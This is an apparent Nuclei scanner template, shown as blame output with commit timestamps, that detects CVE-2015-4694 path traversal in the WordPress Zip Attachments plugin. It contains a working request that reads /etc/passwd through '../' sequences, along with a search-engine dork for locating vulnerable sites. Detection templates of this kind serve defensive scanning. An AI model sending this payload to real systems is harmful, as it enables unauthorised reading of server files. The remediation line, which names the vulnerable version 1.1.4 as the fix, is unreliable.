2021-10-16 09:44:32 +00:00
|
|
|
id: CVE-2015-4694
|
|
|
|
|
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval
|
2021-10-16 09:44:32 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-05-13 20:26:43 +00:00
|
|
|
description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Arbitrary file retrieval
|
2023-09-06 13:22:34 +00:00
|
|
|
remediation: |
|
|
|
|
Update to the latest version of the WordPress Zip Attachments plugin (1.1.4) or remove the plugin if not needed.
|
2022-04-15 16:39:44 +00:00
|
|
|
reference:
|
|
|
|
- https://wordpress.org/plugins/zip-attachments/#developers
|
|
|
|
- https://wpscan.com/vulnerability/8047
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-4694
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://www.vapid.dhs.org/advisory.php?v=126
|
2023-07-15 16:29:17 +00:00
|
|
|
- https://wordpress.org/plugins/zip-attachments/changelog/
|
2021-10-17 11:26:16 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 8.6
|
2021-10-17 11:26:16 +00:00
|
|
|
cve-id: CVE-2015-4694
|
|
|
|
cwe-id: CWE-22
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-score: 0.02304
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-percentile: 0.89683
|
2023-09-06 13:22:34 +00:00
|
|
|
cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:*
|
2022-07-11 17:26:09 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: zip_attachments_project
|
|
|
|
product: zip_attachments
|
2023-09-06 13:22:34 +00:00
|
|
|
framework: wordpress
|
|
|
|
google-query: inurl:"/wp-content/plugins/zip-attachments"
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve2015,cve,wp-plugin,wpscan,lfi,wordpress,zip_attachments_project
|
2021-10-16 09:44:32 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-10-16 09:44:32 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 4b0a00483046022100f0496c4fd3aca32d1a2d8344ea8556de9f811cc86996acd4e61d9751af0339fd022100addd126b0e674d7b130b42aa93991ee8b4cf9f989dcf57581901e4ae8c8856cf:922c64590222798bb761d5b6d8e72950
|